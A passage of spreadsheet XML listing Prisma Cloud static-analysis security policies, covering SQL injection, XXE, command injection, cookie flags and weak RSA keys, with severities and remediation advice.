        <is>
          <t>CKV3_SAST_105</t>
        </is>
      </c>
      <c r="AD400" t="b">
        <v>1</v>
      </c>
      <c r="AE400" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF400" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>4abf3efc-186d-4ae7-a32e-23487eee7649</t>
        </is>
      </c>
      <c r="AI400" t="inlineStr"/>
      <c r="AJ400" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK400" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" t="inlineStr"/>
      <c r="B401" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C401" s="2" t="inlineStr"/>
      <c r="D401" t="inlineStr"/>
      <c r="E401" t="inlineStr"/>
      <c r="F401" t="inlineStr"/>
      <c r="G401" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J401" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K401" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname</t>
        </is>
      </c>
      <c r="L401" t="inlineStr"/>
      <c r="M401" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N401" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O401" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P401" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q401" t="inlineStr"/>
      <c r="R401" t="inlineStr"/>
      <c r="S401" t="inlineStr"/>
      <c r="T401" t="b">
        <v>0</v>
      </c>
      <c r="U401" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V401" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W401" t="inlineStr">
        <is>
          <t>tarfile.extractall used without any validation. You should check members and discard dangerous ones.</t>
        </is>
      </c>
      <c r="X401" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-169</t>
        </is>
      </c>
      <c r="Y401" t="inlineStr"/>
      <c r="Z401" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA401" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB401" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC401" t="inlineStr">
        <is>
          <t>CKV3_SAST_169</t>
        </is>
      </c>
      <c r="AD401" t="b">
        <v>1</v>
      </c>
      <c r="AE401" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF401" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>86176ad5-cd41-4d66-bd68-9afccb3b0536</t>
        </is>
      </c>
      <c r="AI401" t="inlineStr"/>
      <c r="AJ401" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK401" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" t="inlineStr"/>
      <c r="B402" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C402" s="2" t="inlineStr"/>
      <c r="D402" t="inlineStr"/>
      <c r="E402" t="inlineStr"/>
      <c r="F402" t="inlineStr"/>
      <c r="G402" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J402" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K402" t="inlineStr">
        <is>
          <t>Excessive file write permissions</t>
        </is>
      </c>
      <c r="L402" t="inlineStr"/>
      <c r="M402" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N402" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O402" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P402" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q402" t="inlineStr"/>
      <c r="R402" t="inlineStr"/>
      <c r="S402" t="inlineStr"/>
      <c r="T402" t="b">
        <v>0</v>
      </c>
      <c r="U402" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V402" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W402" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications set overly permissive file permissions using io/ioutil.WriteFile. Permissions greater than 0600 can expose files to unauthorized access. It is recommended to use more restrictive permissions, such as 0200 for write-only access, 0400 for read-only access, or 0600 for read/write access by the application user only.</t>
        </is>
      </c>
      <c r="X402" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-254</t>
        </is>
      </c>
      <c r="Y402" t="inlineStr"/>
      <c r="Z402" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA402" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB402" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC402" t="inlineStr">
        <is>
          <t>CKV3_SAST_254</t>
        </is>
      </c>
      <c r="AD402" t="b">
        <v>1</v>
      </c>
      <c r="AE402" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF402" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>762c29bd-061c-4aac-a031-c49b09b8f867</t>
        </is>
      </c>
      <c r="AI402" t="inlineStr"/>
      <c r="AJ402" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK402" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" t="inlineStr"/>
      <c r="B403" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C403" s="2" t="inlineStr"/>
      <c r="D403" t="inlineStr"/>
      <c r="E403" t="inlineStr"/>
      <c r="F403" t="inlineStr"/>
      <c r="G403" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J403" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K403" t="inlineStr">
        <is>
          <t>Cookie created without Secure flag set</t>
        </is>
      </c>
      <c r="L403" t="inlineStr"/>
      <c r="M403" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N403" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O403" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P403" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q403" t="inlineStr"/>
      <c r="R403" t="inlineStr"/>
      <c r="S403" t="inlineStr"/>
      <c r="T403" t="b">
        <v>0</v>
      </c>
      <c r="U403" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V403" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W403" t="inlineStr">
        <is>
          <t>A new cookie is created without the Secure flag set. The Secure flag is a directive to the browser to make sure that the cookie is not sent for insecure communication (http://)</t>
        </is>
      </c>
      <c r="X403" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-19</t>
        </is>
      </c>
      <c r="Y403" t="inlineStr"/>
      <c r="Z403" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA403" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB403" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC403" t="inlineStr">
        <is>
          <t>CKV3_SAST_19</t>
        </is>
      </c>
      <c r="AD403" t="b">
        <v>1</v>
      </c>
      <c r="AE403" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF403" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>d47541f2-03a8-407e-8257-6d699206ee41</t>
        </is>
      </c>
      <c r="AI403" t="inlineStr"/>
      <c r="AJ403" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK403" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" t="inlineStr"/>
      <c r="B404" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C404" s="2" t="inlineStr"/>
      <c r="D404" t="inlineStr"/>
      <c r="E404" t="inlineStr"/>
      <c r="F404" t="inlineStr"/>
      <c r="G404" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J404" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K404" t="inlineStr">
        <is>
          <t>Inadequate RSA encryption strength</t>
        </is>
      </c>
      <c r="L404" t="inlineStr"/>
      <c r="M404" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N404" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O404" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P404" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q404" t="inlineStr"/>
      <c r="R404" t="inlineStr"/>
      <c r="S404" t="inlineStr"/>
      <c r="T404" t="b">
        <v>0</v>
      </c>
      <c r="U404" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V404" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W404" t="inlineStr">
        <is>
          <t>The application is generating an RSA key that is less than the recommended 2048 bits. The National Institute of Standards and Technology (NIST) deprecated signing Digital Certificates that contained RSA Public Keys of 1024 bits in December 2010. While 1024-bit RSA keys have not been factored yet, advances in compute may make it possible in the near future.</t>
        </is>
      </c>
      <c r="X404" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-130</t>
        </is>
      </c>
      <c r="Y404" t="inlineStr"/>
      <c r="Z404" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA404" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB404" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC404" t="inlineStr">
        <is>
          <t>CKV3_SAST_130</t>
        </is>
      </c>
      <c r="AD404" t="b">
        <v>1</v>
      </c>
      <c r="AE404" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF404" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>ab121def-b27c-48ef-b19c-cd436602021a</t>
        </is>
      </c>
      <c r="AI404" t="inlineStr"/>
      <c r="AJ404" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK404" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" t="inlineStr"/>
      <c r="B405" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C405" s="2" t="inlineStr"/>
      <c r="D405" t="inlineStr"/>
      <c r="E405" t="inlineStr"/>
      <c r="F405" t="inlineStr"/>
      <c r="G405" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J405" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K405" t="inlineStr">
        <is>
          <t>Unsecured XML stream reader with external input</t>
        </is>
      </c>
      <c r="L405" t="inlineStr"/>
      <c r="M405" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N405" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O405" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P405" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q405" t="inlineStr"/>
      <c r="R405" t="inlineStr"/>
      <c r="S405" t="inlineStr"/>
      <c r="T405" t="b">
        <v>0</v>
      </c>
      <c r="U405" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V405" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W405" t="inlineStr">
        <is>
          <t>External XML entities, a feature in XML parsers, pose security risks like data exfiltration or DoS attacks. To mitigate these, disabling the doctype  feature is recommended, but it's required for XMLInputFactory. An alternative is configuring the application to use an empty string for ACCESS_EXTERNAL_DTD  and disabling javax.xml.stream.isSupportingExternalEntities.</t>
        </is>
      </c>
      <c r="X405" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-128</t>
        </is>
      </c>
      <c r="Y405" t="inlineStr"/>
      <c r="Z405" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA405" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB405" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC405" t="inlineStr">
        <is>
          <t>CKV3_SAST_128</t>
        </is>
      </c>
      <c r="AD405" t="b">
        <v>1</v>
      </c>
      <c r="AE405" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF405" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>86848113-c55f-4a35-acbe-0f53299b4bb1</t>
        </is>
      </c>
      <c r="AI405" t="inlineStr"/>
      <c r="AJ405" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK405" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" t="inlineStr"/>
      <c r="B406" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C406" s="2" t="inlineStr"/>
      <c r="D406" t="inlineStr"/>
      <c r="E406" t="inlineStr"/>
      <c r="F406" t="inlineStr"/>
      <c r="G406" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J406" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K406" t="inlineStr">
        <is>
          <t>Untrusted data used in OS command execution</t>
        </is>
      </c>
      <c r="L406" t="inlineStr"/>
      <c r="M406" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N406" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O406" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P406" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q406" t="inlineStr"/>
      <c r="R406" t="inlineStr"/>
      <c r="S406" t="inlineStr"/>
      <c r="T406" t="b">
        <v>0</v>
      </c>
      <c r="U406" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V406" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W406" t="inlineStr">
        <is>
          <t>This policy identifies potential OS command injection vulnerabilities in Go applications by detecting the use of untrusted data sources such as environment variables, HTTP request parameters, and various compression and archive readers. The policy flags instances where these untrusted inputs are used in OS command execution functions like exec.Command, exec.CommandContext, syscall.ForkExec, and syscall.StartProcess.</t>
        </is>
      </c>
      <c r="X406" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-265</t>
        </is>
      </c>
      <c r="Y406" t="inlineStr"/>
      <c r="Z406" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA406" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB406" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC406" t="inlineStr">
        <is>
          <t>CKV3_SAST_265</t>
        </is>
      </c>
      <c r="AD406" t="b">
        <v>1</v>
      </c>
      <c r="AE406" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF406" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>818d9c2c-5dcd-4c7a-894e-6a8c28f7a16a</t>
        </is>
      </c>
      <c r="AI406" t="inlineStr"/>
      <c r="AJ406" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK406" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" t="inlineStr"/>
      <c r="B407" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C407" s="2" t="inlineStr"/>
      <c r="D407" t="inlineStr"/>
      <c r="E407" t="inlineStr"/>
      <c r="F407" t="inlineStr"/>
      <c r="G407" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J407" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K407" t="inlineStr">
        <is>
          <t>The function Class.forName() returns a class object with the argument name. This allows users to change the logic of the application in a dangerous way.</t>
        </is>
      </c>
      <c r="L407" t="inlineStr"/>
      <c r="M407" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N407" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O407" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P407" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q407" t="inlineStr"/>
      <c r="R407" t="inlineStr"/>
      <c r="S407" t="inlineStr"/>
      <c r="T407" t="b">
        <v>0</v>
      </c>
      <c r="U407" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V407" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W407" t="inlineStr">
        <is>
          <t>Make sure to not use this function unless there is no other option, and if you do make sure that the called function name is sanitized before using the function.</t>
        </is>
      </c>
      <c r="X407" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-195</t>
        </is>
      </c>
      <c r="Y407" t="inlineStr"/>
      <c r="Z407" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA407" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB407" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC407" t="inlineStr">
        <is>
          <t>CKV3_SAST_195</t>
        </is>
      </c>
      <c r="AD407" t="b">
        <v>1</v>
      </c>
      <c r="AE407" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF407" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>951ff3dc-41fd-4284-b702-d0f6b77b8152</t>
        </is>
      </c>
      <c r="AI407" t="inlineStr"/>
      <c r="AJ407" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK407" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" t="inlineStr"/>
      <c r="B408" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C408" s="2" t="inlineStr"/>
      <c r="D408" t="inlineStr"/>
      <c r="E408" t="inlineStr"/>
      <c r="F408" t="inlineStr"/>
      <c r="G408" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J408" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K408" t="inlineStr">
        <is>
          <t>Not using HttpOnly flag when setting cookies</t>
        </is>
      </c>
      <c r="L408" t="inlineStr"/>
      <c r="M408" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N408" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O408" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P408" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q408" t="inlineStr"/>
      <c r="R408" t="inlineStr"/>
      <c r="S408" t="inlineStr"/>
      <c r="T408" t="b">
        <v>0</v>
      </c>
      <c r="U408" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V408" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W408" t="inlineStr">
        <is>
          <t>Detected an vulnerable when setting cookies with no HttpOnly flag.</t>
        </is>
      </c>
      <c r="X408" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-53</t>
        </is>
      </c>
      <c r="Y408" t="inlineStr"/>
      <c r="Z408" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA408" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB408" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC408" t="inlineStr">
        <is>
          <t>CKV3_SAST_53</t>
        </is>
      </c>
      <c r="AD408" t="b">
        <v>1</v>
      </c>
      <c r="AE408" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF408" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>9f70d043-b3c1-45e6-bfb6-633162d88b3f</t>
        </is>
      </c>
      <c r="AI408" t="inlineStr"/>
      <c r="AJ408" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK408" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" t="inlineStr"/>
      <c r="B409" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C409" s="2" t="inlineStr"/>
      <c r="D409" t="inlineStr"/>
      <c r="E409" t="inlineStr"/>
      <c r="F409" t="inlineStr"/>
      <c r="G409" t="b">
        <v>1</v>
      </c>
      <c r="H4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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J409" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K409" t="inlineStr">
        <is>
          <t>SQL Injection</t>
        </is>
      </c>
      <c r="L409" t="inlineStr"/>
      <c r="M409" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N409" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O409" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P409" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q409" t="inlineStr"/>
      <c r="R409" t="inlineStr"/>
      <c r="S409" t="inlineStr"/>
      <c r="T409" t="b">
        <v>0</v>
      </c>
      <c r="U409" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V409" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W409" t="inlineStr">
        <is>
          <t>To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables</t>
        </is>
      </c>
      <c r="X409" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-260</t>
        </is>
      </c>
      <c r="Y409" t="inlineStr"/>
      <c r="Z409" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA409" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB409" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC409" t="inlineStr">
        <is>
          <t>CKV3_SAST_260</t>
        </is>
      </c>
      <c r="AD409" t="b">
        <v>1</v>
      </c>
      <c r="AE409" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF409" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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09" t="inlineStr">
        <is>
          <t>cb0ba03f-db6b-4b2f-b6b9-26ec92f568fe</t>
        </is>
      </c>
      <c r="AI409" t="inlineStr"/>
      <c r="AJ409" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK409" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" t="inlineStr"/>
      <c r="B410" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C410" s="2" t="inlineStr"/>
      <c r="D410" t="inlineStr"/>
      <c r="E410" t="inlineStr"/>
      <c r="F410" t="inlineStr"/>
      <c r="G410" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J410" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K410" t="inlineStr">
        <is>
          <t>Observable timing discrepancy</t>
        </is>
      </c>
      <c r="L410" t="inlineStr"/>
      <c r="M410" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N410" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O410" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P410" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q410" t="inlineStr"/>
      <c r="R410" t="inlineStr"/>
      <c r="S410" t="inlineStr"/>
      <c r="T410" t="b">
        <v>0</v>
      </c>
      <c r="U410" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V410" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W410" t="inlineStr">
        <is>
          <t>The application performs insecure string comparisons using ===, !==, ==, or !=, making it susceptible to timing attacks. To fix this, replace these comparisons with crypto.timingSafeEqual for secure, constant-time string comparisons.</t>
        </is>
      </c>
      <c r="X410" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-161</t>
        </is>
      </c>
      <c r="Y410" t="inlineStr"/>
      <c r="Z410" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA410" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB410" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC410" t="inlineStr">
        <is>
          <t>CKV3_SAST_161</t>
        </is>
      </c>
      <c r="AD410" t="b">
        <v>1</v>
      </c>
      <c r="AE410" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF410" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>181c81cd-1f44-47df-a6bb-f7991c94dbf7</t>
        </is>
      </c>
      <c r="AI410" t="inlineStr"/>
      <c r="AJ410" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK410" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" t="inlineStr"/>
      <c r="B411" s="2" t="inlineStr">
